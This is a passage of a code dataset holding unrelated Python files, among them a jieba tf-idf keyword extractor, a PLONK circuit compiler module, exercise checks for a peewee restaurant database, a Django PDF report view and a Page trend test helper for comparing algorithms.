math\nimport jieba\nimport jieba.posseg as psg\nimport functools\nimport numpy as np\n\n\nclass Tf_Idf(object):\n    def __init__(self, idf_dic, default_idf, word_list, keyword_num):\n        \"\"\"\n\n        :param idf_dic: trained idf dictionary\n        :param default_idf: default idf value for words missing from idf_dic\n        :param word_list: processed document for selecting important words\n        :param keyword_num: number of important words to select\n        \"\"\"\n        self.idf_dic, self.default_idf = idf_dic, default_idf\n        self.word_list = word_list\n        self.tf_dic = self.get_tf_dic()  # calculate the tf values\n        self.keyword_num = keyword_num\n\n    def get_tf_dic(self):\n        # calculate the tf value\n        tf_dic = {}\n        for word in self.word_list:\n            tf_dic[word] = tf_dic.get(word, 0.0) + 1.0\n        tt_count = len(self.word_list)\n        for k, v in tf_dic.items():\n            tf_dic[k] = float(v) / tt_count\n        return tf_dic\n\n    def get_tfidf(self):\n        # calculate the tf-idf value\n        tfidf_dic = {}\n        for word in self.word_list:\n            idf = self.idf_dic.get(word, self.default_idf)\n            tf = self.tf_dic.get(word, 0)\n            tfidf = tf * idf\n            tfidf_dic[word] = tfidf\n        k_word = []\n        for k, v in sorted(tfidf_dic.items(), key=functools.cmp_to_key(cmp), reverse=True)[:self.keyword_num]:\n            k_word.append(k)\n\n        return k_word\n\n\ndef get_stopword_list():\n    stop_word_path = 'api/stopword.txt'\n    stopword_list = [sw.replace('\\n', '') for sw in open(stop_word_path, encoding=\"utf-8\").readlines()]\n    return stopword_list\n\n\n# tokenization\ndef seg_to_list(sentence, pos=False):\n    \"\"\"\n\n    :param sentence:\n    :param pos: whether to tag each token with its lexical category (POS)\n    :return:\n    \"\"\"\n    if not pos:\n        seg_list = jieba.cut(sentence)\n    else:\n        seg_list = psg.cut(sentence)\n    return seg_list\n\n\n# filter out stop words and noise\ndef word_filter(seg_list, pos=False):\n    \"\"\"\n\n    1: filter according to the tokenization result\n    2: depending on @param pos, decide whether to drop lexical categories other than nouns\n    3: check membership in the stop word list and check the word length\n    \"\"\"\n    stopword_list = get_stopword_list()\n    filter_list = []\n    for seg in seg_list:\n        if not pos:\n            word = seg\n            flag = 'n'  # if pos=False, all the words are marked as 'nouns' and kept\n        else:\n            word = seg.word\n            flag = seg.flag\n        if not flag.startswith('n'):\n            continue\n        if not word in stopword_list and len(word) > 1:\n            filter_list.append(word)\n    return filter_list\n\n\n# load the dataset, do tokenization and filtering\ndef load_data(pos=False, corpus_path='api/corpus.txt'):\n    \"\"\"\n    process the dataset; afterwards only informative (non-stop) words remain in each doc\n    :param pos: whether to POS-tag the words\n    :param corpus_path: 
path to dataset\n    :return:\n    \"\"\"\n    doc_list = []\n    for line in open(corpus_path, 'r', encoding=\"utf-8\"):\n        content = line.strip()  # get data of each line\n        seg_list = seg_to_list(content, pos)  # tokenization\n        filter_list = word_filter(seg_list, pos)  # filter out the stopwords\n        doc_list.append(filter_list)\n    return doc_list\n\n\ndef train_idf(doc_list):\n    \"\"\"\n\n    generate the IDF dictionary from 'doc_list', used to compute 'TF-IDF' later\n    \"\"\"\n    idf_dic = {}\n    tt_count = len(doc_list)  # total number of docs in doc_list\n    # count the number of documents each word occurs in\n    for doc in doc_list:\n        for word in set(doc):\n            idf_dic[word] = idf_dic.get(word, 0.0) + 1.0\n    # transform to idf values; add 1 to the denominator for smoothing\n    for k, v in idf_dic.items():\n        idf_dic[k] = math.log(tt_count / (v + 1.0))\n    # for words that do not occur in the dictionary, assume by default that they appear in one document\n    # and assign them this default idf value\n    default_idf = math.log(tt_count / 1.0)\n    return idf_dic, default_idf\n\n\ndef tfidf_extract(word_list, pos=False, keyword_num=5):\n    doc_list = load_data(pos)\n    idf_dic, default_idf = train_idf(doc_list)\n    tfidf_model = Tf_Idf(idf_dic, default_idf, word_list, keyword_num)\n    return tfidf_model.get_tfidf()\n\n\ndef cmp(e1, e2):\n    res = np.sign(e1[1] - e2[1])\n    if res != 0:  # sort by importance value\n        return res\n    else:  # if the values are equal, sort by word\n        a = e1[0] + e2[0]\n        b = e2[0] + e1[0]\n        if a > b:\n            return 1\n        elif a == b:\n            return 0\n        else:\n            return -1\n","repo_name":"sumaaail/Daily-life","sub_path":"api/nlp.py","file_name":"nlp.py","file_ext":"py","file_size_in_byte":4566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
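A hedged usage sketch for the tf-idf extractor above; it assumes the module is importable as api.nlp and that api/corpus.txt and api/stopword.txt are present:

from api.nlp import seg_to_list, word_filter, tfidf_extract  # import path assumed

text = "自然语言处理是人工智能领域的一个重要方向"
words = word_filter(seg_to_list(text, pos=False), pos=False)
print(tfidf_extract(words, pos=False, keyword_num=3))  # top-3 keywords by tf-idf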
+{"seq_id":"623575738","text":"#### Write a program that asks for values and appends them to a list until the user presses the\n#### letter ‘q’. Using a function on that user-entered list, remove the duplicates from the list.\n#### Then display the initial list and the list without the duplicates.\n\ndef eliminar(num1,num2):\n    for i in num1:\n        if i not in num2:\n            num2.append(i)\n\nrepetir = True\nlista1 = []\nlista2 = []\n\n\n\nwhile repetir:\n    dato1 = input(\"Enter a number ('q' to quit): \")\n    lista1.append(dato1)\n    if dato1 == \"q\":\n        repetir = False\n    \nlista1.pop(-1)\n\neliminar(lista1,lista2)\n\nprint(\"The initial list is:\",lista1,\"\\nThe final list is:\",lista2)\n","repo_name":"Javiercc1988/Python_practica_funciones","sub_path":"valores_repetidos.py","file_name":"valores_repetidos.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30505061318","text":"# A simple zk language, reverse-engineered to match https://zkrepl.dev/ output\n\nfrom utils import *\nfrom .assembly import *\nfrom .utils import *\nfrom typing import Optional, Set\nfrom poly import Polynomial, Basis\n\n\n@dataclass\nclass CommonPreprocessedInput:\n    \"\"\"Common preprocessed input\"\"\"\n\n    group_order: int\n    # q_M(X) multiplication selector polynomial\n    QM: Polynomial\n    # q_L(X) left selector polynomial\n    QL: Polynomial\n    # q_R(X) right selector polynomial\n    QR: Polynomial\n    # q_O(X) output selector polynomial\n    QO: Polynomial\n    # q_C(X) constants selector polynomial\n    QC: Polynomial\n    # S_σ1(X) first permutation polynomial S_σ1(X)\n    S1: Polynomial\n    # S_σ2(X) second permutation polynomial S_σ2(X)\n    S2: Polynomial\n    # S_σ3(X) third permutation polynomial S_σ3(X)\n    S3: Polynomial\n\n\nclass Program:\n    constraints: list[AssemblyEqn]\n    group_order: int\n\n    def __init__(self, constraints: list[str], group_order: int):\n        if len(constraints) > group_order:\n            raise Exception(\"Group order too small\")\n        assembly = [eq_to_assembly(constraint) for constraint in constraints]\n        self.constraints = assembly\n        self.group_order = group_order\n\n    def common_preprocessed_input(self) -> CommonPreprocessedInput:\n        L, R, M, O, C = self.make_gate_polynomials()\n        S = self.make_s_polynomials()\n        return CommonPreprocessedInput(\n            self.group_order,\n            M,\n            L,\n            R,\n            O,\n            C,\n            S[Column.LEFT],\n            S[Column.RIGHT],\n            S[Column.OUTPUT],\n        )\n\n    @classmethod\n    def from_str(cls, constraints: str, group_order: int):\n        lines = [line.strip() for line in constraints.split(\"\\n\")]\n        return cls(lines, group_order)\n\n    def coeffs(self) -> list[dict[Optional[str], int]]:\n        return [constraint.coeffs for constraint in self.constraints]\n\n    def wires(self) -> list[GateWires]:\n        return [constraint.wires for constraint in self.constraints]\n\n    def make_s_polynomials(self) -> dict[Column, Polynomial]:\n        # For each variable, extract the list of (column, row) positions\n        # where that variable is used\n        variable_uses: dict[Optional[str], Set[Cell]] = {None: set()}\n        for row, constraint in enumerate(self.constraints):\n            for column, value in zip(Column.variants(), constraint.wires.as_list()):\n                if value not in variable_uses:\n                    variable_uses[value] = set()\n                variable_uses[value].add(Cell(column, row))\n\n        # Mark unused cells\n        for row in range(len(self.constraints), self.group_order):\n            for column in Column.variants():\n                variable_uses[None].add(Cell(column, row))\n\n        # For each list of positions, rotate by one.\n        #\n        # For example, if some variable is used in positions\n        # (LEFT, 4), (LEFT, 7) and (OUTPUT, 2), then we store:\n        #\n        # at S[LEFT][7] the field element representing (LEFT, 4)\n        # at S[OUTPUT][2] the field element representing (LEFT, 7)\n        # at S[LEFT][4] the field element 
representing (OUTPUT, 2)\n\n        S_values = {\n            Column.LEFT: [Scalar(0)] * self.group_order,\n            Column.RIGHT: [Scalar(0)] * self.group_order,\n            Column.OUTPUT: [Scalar(0)] * self.group_order,\n        }\n\n        for _, uses in variable_uses.items():\n            sorted_uses = sorted(uses)\n            for i, cell in enumerate(sorted_uses):\n                next_i = (i + 1) % len(sorted_uses)\n                next_column = sorted_uses[next_i].column\n                next_row = sorted_uses[next_i].row\n                S_values[next_column][next_row] = cell.label(self.group_order)\n\n        S = {}\n        S[Column.LEFT] = Polynomial(S_values[Column.LEFT], Basis.LAGRANGE)\n        S[Column.RIGHT] = Polynomial(S_values[Column.RIGHT], Basis.LAGRANGE)\n        S[Column.OUTPUT] = Polynomial(S_values[Column.OUTPUT], Basis.LAGRANGE)\n\n        return S\n\n    # Get the list of public variable assignments, in order\n    def get_public_assignments(self) -> list[Optional[str]]:\n        coeffs = self.coeffs()\n        o = []\n        no_more_allowed = False\n        for coeff in coeffs:\n            if coeff.get(\"$public\", False) is True:\n                if no_more_allowed:\n                    raise Exception(\"Public var declarations must be at the top\")\n                var_name = [x for x in list(coeff.keys()) if \"$\" not in str(x)][0]\n                if coeff != {\"$public\": True, \"$output_coeff\": 0, var_name: -1}:\n                    raise Exception(\"Malformatted coeffs: {}\".format(coeffs))\n                o.append(var_name)\n            else:\n                no_more_allowed = True\n        return o\n\n    # Generate the gate polynomials: L, R, M, O, C,\n    # each a list of length `group_order`\n    def make_gate_polynomials(\n        self,\n    ) -> tuple[Polynomial, Polynomial, Polynomial, Polynomial, Polynomial]:\n        L = [Scalar(0) for _ in range(self.group_order)]\n        R = [Scalar(0) for _ in range(self.group_order)]\n        M = [Scalar(0) for _ in range(self.group_order)]\n        O = [Scalar(0) for _ in range(self.group_order)]\n        C = [Scalar(0) for _ in range(self.group_order)]\n        for i, constraint in enumerate(self.constraints):\n            gate = constraint.gate()\n            L[i] = gate.L\n            R[i] = gate.R\n            M[i] = gate.M\n            O[i] = gate.O\n            C[i] = gate.C\n        return (\n            Polynomial(L, Basis.LAGRANGE),\n            Polynomial(R, Basis.LAGRANGE),\n            Polynomial(M, Basis.LAGRANGE),\n            Polynomial(O, Basis.LAGRANGE),\n            Polynomial(C, Basis.LAGRANGE),\n        )\n\n    # Attempts to \"run\" the program to fill in any intermediate variable\n    # assignments, starting from the given assignments. Eg. 
if\n # `starting_assignments` contains {'a': 3, 'b': 5}, and the first line\n # says `c <== a * b`, then it fills in `c: 15`.\n def fill_variable_assignments(\n self, starting_assignments: dict[Optional[str], int]\n ) -> dict[Optional[str], int]:\n out = {k: Scalar(v) for k, v in starting_assignments.items()}\n out[None] = Scalar(0)\n for constraint in self.constraints:\n wires = constraint.wires\n coeffs = constraint.coeffs\n in_L = wires.L\n in_R = wires.R\n output = wires.O\n out_coeff = coeffs.get(\"$output_coeff\", 1)\n product_key = get_product_key(in_L, in_R)\n if output is not None and out_coeff in (-1, 1):\n new_value = (\n Scalar(\n coeffs.get(\"\", 0)\n + out[in_L] * coeffs.get(in_L, 0)\n + out[in_R] * coeffs.get(in_R, 0) * (1 if in_R != in_L else 0)\n + out[in_L] * out[in_R] * coeffs.get(product_key, 0)\n )\n * out_coeff\n ) # should be / but equivalent for (1, -1)\n if output in out:\n if out[output] != new_value:\n raise Exception(\n \"Failed assertion: {} = {}\".format(out[output], new_value)\n )\n else:\n out[output] = new_value\n # print('filled in:', output, out[output])\n return {k: v.n for k, v in out.items()}\n","repo_name":"0xPARC/plonkathon","sub_path":"compiler/program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":7471,"program_lang":"python","lang":"en","doc_type":"code","stars":128,"dataset":"github-code","pt":"54"} +{"seq_id":"15942813696","text":"import peewee # type: ignore\nfrom wincpy.checks.utils import StandardChecks\n\n__winc_id__ = \"286787689e9849969c326ee41d8c53c4\"\n\n\ndef check_db_init(student_module):\n \"\"\"The database can be initialized properly\"\"\"\n setup_data(student_module.models)\n\n\ndef check_cheapest_dish(student_module):\n \"\"\"`cheapest_dish` is implemented correctly\"\"\"\n StandardChecks.n_params(student_module.cheapest_dish, n_params=0)\n StandardChecks.n_params(student_module.models.Dish.select, n_params=1)\n\n dish = student_module.cheapest_dish()\n expected_dish = (\n student_module.models.Dish.select()\n .order_by(student_module.models.Dish.price_in_cents)\n .first()\n )\n assert dish == expected_dish, f\"Expected the cheapest dish to be {expected_dish}.\"\n assert type(dish) == type(\n expected_dish\n ), f\"Expected the cheapest dish to be {expected_dish}.\"\n\n\ndef check_vegetarian_dishes(student_module):\n \"\"\"`vegetarian_dishes` is implemented correctly\"\"\"\n StandardChecks.n_params(student_module.vegetarian_dishes, n_params=0)\n StandardChecks.n_params(student_module.models.Dish.select, n_params=1)\n\n dishes = student_module.vegetarian_dishes()\n expected_dishes = set(\n [\n dish\n for dish in student_module.models.Dish.select()\n if all([i.is_vegetarian for i in dish.ingredients])\n ]\n )\n assert (\n set(dishes) == expected_dishes\n ), f\"Expected vegetarian dishes to be {expected_dishes}\"\n\n\ndef check_best_restaurant(student_module):\n \"\"\"`best_average_rating` is implemented correctly\"\"\"\n StandardChecks.n_params(student_module.best_average_rating, n_params=0)\n\n restaurant = student_module.best_average_rating()\n expected_restaurant = (\n student_module.models.Restaurant.select(\n student_module.models.Restaurant,\n peewee.fn.AVG(student_module.models.Rating.rating).alias(\"average\"),\n )\n .join(student_module.models.Rating)\n .group_by(student_module.models.Restaurant)\n .order_by(peewee.fn.AVG(student_module.models.Rating.rating).desc())\n .first()\n )\n assert (\n restaurant == expected_restaurant\n ), f\"Expected the best restaurant to be {expected_restaurant}\"\n assert 
type(restaurant) == type(\n expected_restaurant\n ), f\"Expected the best restaurant to be {expected_restaurant}\"\n\n\ndef check_add_rating(student_module):\n \"\"\"`add_rating_to_restaurant` is implemented correctly\"\"\"\n StandardChecks.n_params(student_module.add_rating_to_restaurant, n_params=0)\n\n current_rating_count = student_module.models.Rating.select().count()\n student_module.add_rating_to_restaurant()\n new_rating_count = student_module.models.Rating.select().count()\n assert (\n current_rating_count < new_rating_count\n ), f\"Expected number of ratings to go from {current_rating_count} to {current_rating_count + 1}\"\n\n\ndef check_dinner_date_possible(student_module):\n \"\"\"`dinner_date_possible` is implemented correctly\"\"\"\n StandardChecks.n_params(student_module.dinner_date_possible, n_params=0)\n\n date_restaurants = student_module.dinner_date_possible()\n expected_date_restaurants = [\n restaurant\n for restaurant in student_module.models.Restaurant.select()\n .where(student_module.models.Restaurant.opening_time <= \"19:00\")\n .where(student_module.models.Restaurant.closing_time >= \"19:00\")\n if any(\n [\n all([i.is_vegan for i in dish.ingredients])\n for dish in restaurant.dish_set.select()\n ]\n )\n ]\n assert set(date_restaurants) == set(\n expected_date_restaurants\n ), f\"Expected dinner date restaurants to be {expected_date_restaurants}\"\n\n\ndef check_add_dish_to_menu(student_module):\n \"\"\"`add_dish_to_menu` is implemented correctly\"\"\"\n StandardChecks.n_params(student_module.add_dish_to_menu, n_params=0)\n\n new_dish = student_module.add_dish_to_menu()\n assert new_dish, \"Expected the new dish to be returned\"\n assert \"cheese\" in [\n x.name for x in new_dish.ingredients\n ], \"Expected 'cheese' to be in the ingredients for the new dish\"\n assert (\n student_module.models.Ingredient.select()\n .where(student_module.models.Ingredient.name == \"cheese\")\n .count()\n == 1\n ), \"The ingredient 'cheese' was created twice\"\n\n\ndef setup_data(models):\n models.db.connect()\n models.db.create_tables(\n [\n models.Ingredient,\n models.Restaurant,\n models.Dish,\n models.Rating,\n models.DishIngredient,\n ]\n )\n\n ingredient_data = [\n (\"milk\", True, False, True),\n (\"flour\", True, True, False),\n (\"eggs\", True, False, True),\n (\"bread\", True, True, False),\n (\"beef\", False, False, True),\n (\"tomato\", True, True, True),\n (\"cheese\", True, False, True),\n (\"jellybeans\", True, False, True),\n (\"cod\", True, False, True),\n (\"potato\", True, True, True),\n (\"banana\", True, True, True),\n (\"peanutbutter\", True, True, True),\n (\"aquafaba\", True, True, True),\n (\"eggplant\", True, True, True),\n (\"zuchinni\", True, True, True),\n (\"mushrooms\", True, True, True),\n ]\n\n restaurant_data = [\n (\n (\"Flavortown\", \"2012-01-01\", \"15:00\", \"23:30\"),\n [\n (\"Pancakes a la mode\", 700, (\"milk\", \"flour\", \"eggs\")),\n (\"Bacon burger\", 1200, (\"bread\", \"beef\", \"tomato\", \"cheese\")),\n (\"Omelette du Fromage\", 800, (\"eggs\", \"cheese\")),\n (\"Milk steak\", 1000, (\"beef\", \"milk\", \"jellybeans\")),\n ],\n [\n (5, None),\n (3, \"weird menu\"),\n (2, \"my milk steak was not boiled over hard\"),\n (4, None),\n (5, None),\n ],\n ),\n (\n (\"Freddies Fish\", \"2016-03-01\", \"11:00\", \"18:30\"),\n [\n (\"Fish n Chips\", 900, (\"cod\", \"flour\", \"eggs\", \"potato\")),\n (\"Ketchup-filled fries\", 300, (\"potato\", \"tomato\")),\n (\"Fish Fries\", 800, (\"potato\", \"cod\")),\n ],\n [\n (4, None),\n (3, None),\n (3, 
None),\n (3, None),\n (1, None),\n (1, None),\n (2, None),\n (1, None),\n ],\n ),\n (\n (\"Petes Peanutbutter Palace\", \"2019-08-02\", \"10:00\", \"17:30\"),\n [\n (\"Banana Pancakes\", 700, (\"milk\", \"flour\", \"eggs\", \"banana\")),\n (\"Elvis burger\", 1200, (\"bread\", \"beef\", \"banana\", \"peanutbutter\")),\n (\"Vegan Pancakes\", 800, (\"banana\", \"aquafaba\", \"peanutbutter\")),\n ],\n [\n (5, None),\n (3, None),\n (5, \"i love peanut butter\"),\n (4, \"not much choice\"),\n (4, None),\n ],\n ),\n (\n (\"Chique Food Boutique\", \"2020-01-01\", \"18:00\", \"23:30\"),\n [\n (\"Fancy Frittata\", 1700, (\"eggs\", \"flour\", \"cheese\", \"tomato\")),\n (\"Ratatouille\", 3200, (\"tomato\", \"zuchinni\", \"eggplant\")),\n (\"Boeuf Bourguignon\", 3300, (\"beef\", \"mushrooms\", \"potato\")),\n ],\n [\n (5, None),\n (5, \"expensive but real good\"),\n (5, None),\n (5, None),\n (5, None),\n (5, None),\n ],\n ),\n ]\n\n ingredient_map = {\n n: models.Ingredient.create(\n name=n, is_vegetarian=is_v, is_vegan=is_vv, is_glutenfree=is_g\n )\n for n, is_v, is_vv, is_g in ingredient_data\n }\n\n for restaurant, dishes, ratings in restaurant_data:\n restaurant = models.Restaurant.create(\n name=restaurant[0],\n open_since=restaurant[1],\n opening_time=restaurant[2],\n closing_time=restaurant[3],\n )\n for dish_data in dishes:\n dish = models.Dish.create(\n name=dish_data[0],\n served_at=restaurant,\n price_in_cents=dish_data[1],\n )\n dish_ingredients = [ingredient_map[x] for x in dish_data[2]]\n dish.ingredients.add(dish_ingredients)\n for rating in ratings:\n models.Rating.create(\n restaurant=restaurant, rating=rating[0], comment=rating[1]\n )\n","repo_name":"WincAcademy/wincpy","sub_path":"wincpy/checks/286787689e9849969c326ee41d8c53c4.py","file_name":"286787689e9849969c326ee41d8c53c4.py","file_ext":"py","file_size_in_byte":8583,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"41087424543","text":"import re\r\ns=\"Abc welcome 2Check paT3en ano3ter check3alTd 22Checj B5 8C\"\r\n\r\nlst=s.split()\r\nprint(lst)\r\n\r\nfor items in lst:\r\n patmatched = re.search(r\"(.*[A-Z].*\\d.*)|(\\d{2}[A-Z].*)|(.*\\d{1}.*[A-Z].*)|([A-Z][a-z].*)\",items)\r\n if patmatched:\r\n print(patmatched.group(0))","repo_name":"SNBhushan/BASICS-OF-PYTHON","sub_path":"pyRegex9.py","file_name":"pyRegex9.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8662640676","text":"import jsonlines\n\n\ncenter_dict = dict()\nfor idx in range(1, 4):\n center_dict[idx] = []\n with open('./center_words/' + str(idx) + '.txt', 'r', encoding='utf-8') as f:\n words = f.readlines()\n for w in words:\n center_dict[idx].append(w.strip())\n\ncounter = [0, 0, 0, 0]\nempty = 0\n\nwith jsonlines.open('./data/cleaned_data.json') as reader:\n for item in reader:\n qas = item['qas'][0]\n is_empty = True\n for qa in qas:\n if len(qa['answers']) != 0 and qa['question'] == '中心词':\n center = qa['answers'][0]['text']\n is_empty = False\n if is_empty:\n empty += 1\n continue\n flag = True\n for idx in range(1, 4):\n if center in center_dict[idx]:\n counter[idx] += 1\n flag = False\n break\n if flag:\n print(center)\n counter[0] += 1\n\nprint(counter, empty)\n 
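An in-memory sketch of the bucket-counting loop above; the words are hypothetical stand-ins for center_words/*.txt and data/cleaned_data.json, and a for/else replaces the flag variable:

center_dict = {1: ["因为"], 2: ["导致"], 3: ["由于"]}
counter = [0, 0, 0, 0]
for center in ["导致", "因为", "所以"]:
    for idx in range(1, 4):
        if center in center_dict[idx]:
            counter[idx] += 1
            break
    else:
        counter[0] += 1  # unmatched center words fall into bucket 0
print(counter)  # [1, 1, 1, 0]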
\n","repo_name":"windszzlang/CBCP_End2End_Causality_Extraction","sub_path":"data/EDA/proportion.py","file_name":"proportion.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"10926014748","text":"'''\r\nCreated on Sep 12, 2018\r\n\r\n@author: connor\r\n'''\r\nfrom collections import defaultdict\r\n\r\ndef fill_dict(file_name):\r\n    tracks_dict = defaultdict(list)\r\n    current_playlist = \"No Name Given\"\r\n    tracks_f = open(file_name)\r\n    for text in tracks_f:\r\n        text = text.strip()\r\n        if text.startswith(\"https://open.spotify.com\"):\r\n            tracks_dict[text[31:]].append(current_playlist)\r\n        else:\r\n            current_playlist = text\r\n    return tracks_dict\r\n\r\ndef print_dups(tracks):\r\n    print(\"Duplicate Tracks:\")\r\n    for track in tracks:\r\n        if len(tracks[track]) > 1:\r\n            print(track + \" Appears in \" + str(tracks[track]) + \" WebLink: https://open.spotify.com/track/\"+track)\r\n    print(\"End of Duplicate Tracks\")\r\n\r\nif __name__ == \"__main__\":\r\n    #format for track_list is one line for playlist name, one line for each track, next playlist name...\r\n    tracks_file = \"track_list\"\r\n    tracks_dict = fill_dict(tracks_file)\r\n    print_dups(tracks_dict)\r\n","repo_name":"ConnorBurnsCoder/Spotify_duplicates","sub_path":"dup_finder.py","file_name":"dup_finder.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"3527535582","text":"from __future__ import unicode_literals\nfrom django.utils import timezone\nfrom django.contrib.auth.models import User\nfrom django.db import models\n\n\nclass Assignment(models.Model):\n    status = models.IntegerField(default = 1)\n    student = models.ForeignKey(User, related_name=\"student\")\n\n\nclass Task(models.Model):\n    title = models.CharField(max_length=50, default=\"\")\n    description = models.CharField(max_length=500)\n    # A Task can have many assignments\n    assignments = models.ManyToManyField(Assignment, related_name=\"assignments\")\n    owner = models.ForeignKey(User, related_name=\"owner\")\n    created_time = models.DateTimeField(editable=False)\n    modified_time = models.DateTimeField(null=True, blank=True)\n\n    # This method is for updating created and modified times on Saving an object\n    def save(self, *args, **kwargs):\n        ''' On save, update timestamps '''\n        if not self.id:\n            self.created_time = timezone.now()\n        self.modified_time = timezone.now()\n        return super(Task, self).save(*args, **kwargs)\n","repo_name":"narenaryan/Tasker","sub_path":"base/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"54"} +{"seq_id":"19971102023","text":"import os\r\nfrom django.conf import settings\r\nfrom django.http import HttpResponse\r\nfrom django.template.loader import get_template\r\nfrom xhtml2pdf import pisa\r\nfrom django.contrib.staticfiles import finders\r\nfrom israel_palma.models import Servicio\r\n\r\n\r\ndef link_callback(uri, rel):\r\n    \"\"\"\r\n    Convert HTML URIs to absolute system paths so xhtml2pdf can access those\r\n    resources\r\n    \"\"\"\r\n    result = finders.find(uri)\r\n    if result:\r\n        if not isinstance(result, (list, tuple)):\r\n            result = [result]\r\n        result = list(os.path.realpath(path) for path in result)\r\n        path=result[0]\r\n    else:\r\n        sUrl = settings.STATIC_URL  # Typically /static/\r\n        sRoot = settings.STATIC_ROOT  # Typically 
/home/userX/project_static/\r\n        mUrl = settings.MEDIA_URL  # Typically /media/\r\n        mRoot = settings.MEDIA_ROOT  # Typically /home/userX/project_static/media/\r\n\r\n        if uri.startswith(mUrl):\r\n            path = os.path.join(mRoot, uri.replace(mUrl, \"\"))\r\n        elif uri.startswith(sUrl):\r\n            path = os.path.join(sRoot, uri.replace(sUrl, \"\"))\r\n        else:\r\n            return uri\r\n\r\n    # make sure that file exists\r\n    if not os.path.isfile(path):\r\n        raise Exception(\r\n            'media URI must start with %s or %s' % (sUrl, mUrl)\r\n        )\r\n    return path\r\n\r\ndef render_pdf_view(request, id):\r\n    template_path = 'reportes/prueba.html'\r\n    \r\n    if id > 1:\r\n        template_path = f'reportes/prueba{id}.html'\r\n    \r\n\r\n    context = {'usuario': 'this comes from the context'}\r\n    # example of how to get the context from a model\r\n    if id == 7:\r\n        servicios = Servicio.objects.all()\r\n        context = {\"servicios\":servicios,'titulo':'Lista Servicios'}\r\n    \r\n    # Create a Django response object, and specify content_type as pdf\r\n    response = HttpResponse(content_type='application/pdf')\r\n    response['Content-Disposition'] = 'inline; filename=\"prueba.pdf\"'  # response['Content-Disposition'] = 'attachment; filename=\"report.pdf\"'\r\n    # find the template and render it.\r\n    template = get_template(template_path)\r\n    html = template.render(context)\r\n\r\n    # create a pdf\r\n    pisa_status = pisa.CreatePDF(\r\n        html, dest=response, link_callback=link_callback)\r\n    # if error then show some funny view\r\n    if pisa_status.err:\r\n        return HttpResponse('We had some errors <pre>' + html + '</pre>')\r\n    return response","repo_name":"learsixela/caos_total","sub_path":"reportes/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2760,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"}
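A minimal sketch of the pisa.CreatePDF call used in the view above, stripped of the Django response plumbing; the HTML and output filename are arbitrary:

from io import BytesIO
from xhtml2pdf import pisa

html = "<h1>Lista Servicios</h1><p>prueba</p>"
buf = BytesIO()
status = pisa.CreatePDF(html, dest=buf)  # same call as in render_pdf_view
if not status.err:
    with open("prueba.pdf", "wb") as f:  # filename chosen arbitrarily
        f.write(buf.getvalue())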
+{"seq_id":"36656636842","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.lines as mlines\n\nfrom typing import Any\nfrom typing import cast, Union\nfrom typing import Optional # telling the type checker that either an object of the specific type is required, or None is required\nimport time\n\nfrom collections import namedtuple\nfrom scipy.stats import page_trend_test as ptest # \"results\\n L=%.2f, p-value=%.5f, method=%s\" % (r.statistic, r.pvalue, r.method)\n\nclass PageTest:\n    \"\"\"Allows the Page Trend Test to be performed to compare the convergence of two EAs' fitnesses.\n    - This allows algorithms with different x-axis values to be compared via projection \n    onto a unified x-axis.\n    - Algorithm results are added problem by problem. \n\n    Args:\n\n        num_cuts:\n            The number of cuts. Typically half the number of rows/problems considered.\n        \n        max_x:\n            Select the maximum x-axis value to go up to.\n        \n        invert:\n            Binary integer value. Rather than considering algorithm results A-B, consider B-A.\n\n    \"\"\"\n\n    \n\n    def __init__(\n        self,\n        num_cuts: int,\n        max_x: Optional[float] = None,\n        invert: int = 0,\n        problem_labels: Optional[list] = None,\n    ):\n        \n        # # Set the number of cuts\n        self.num_cuts = num_cuts\n\n        assert invert == 0 or invert == 1, \"Invert must be binary integer\"\n        self.invert = invert\n        self.max_x = max_x\n        self.problem_labels = problem_labels\n\n        self.results_so_far = []\n\n\n        return\n\n    @property\n    def matrix(self) -> np.ndarray:\n        \"\"\"Fetch the matrix of cuts of the difference between algorithm convergences\"\"\"\n        assert len(self.results_so_far) > 0, \"Need to add some problem results\"\n        assert len(self.results_so_far) > self.num_cuts, \"Ensure you have considered more problems than the number of cuts\"\n        return [c.cuts_y for c in self.results_so_far]\n\n\n    def plot_cuts(self, save: Optional[str] = None, show: int=1):\n        \"\"\"Plot the problem convergence and cuts for the algos added so far\"\"\"\n\n        y = [c.y for c in self.results_so_far]\n        x = [c.cx for c in self.results_so_far] # relative x axis in terms of cuts\n        cx = [c.cuts_x for c in self.results_so_far]\n        cy = self.matrix\n\n        y_flat = np.array(y).flatten()\n        ymin = np.min(y_flat)\n        ymax = np.max(y_flat)\n\n\n        fig, ax = plt.subplots()\n\n        for f, arr in enumerate(y):\n            \n            max = np.max(abs(arr))\n\n            if self.problem_labels is None:\n                ax.plot(x[f], y[f]/max, label='f%d' % (f), alpha=1)\n            else:\n                ax.plot(x[f], y[f]/max, label='f%d (%s)' % (f, self.problem_labels[f]), alpha=1)\n\n\n            ax.plot(cy[f]/max,'x', color='k', alpha=0.75, markersize=5)\n\n        for xx in range(self.num_cuts):\n            # ax.plot([xx,xx],[ymin,ymax], '--', color='k', alpha=0.15) # plot line\n            ax.plot([xx,xx],[-1,1], '--', color='k', alpha=0.15) # plot line\n\n        ax.set_xlabel('cuts')\n        if self.invert == 0:\n            ax.set_ylabel('normalised fitness{A-B}')\n        elif self.invert == 1:\n            ax.set_ylabel('normalised fitness{B-A}')\n\n\n        handles, labels = ax.get_legend_handles_labels()\n        handles.append(mlines.Line2D([], [], color='k', marker='x', markersize=5, label='cuts', linestyle=''))\n        ax.legend(handles=handles)\n\n\n        if show == 1:\n            plt.show()\n\n        if save 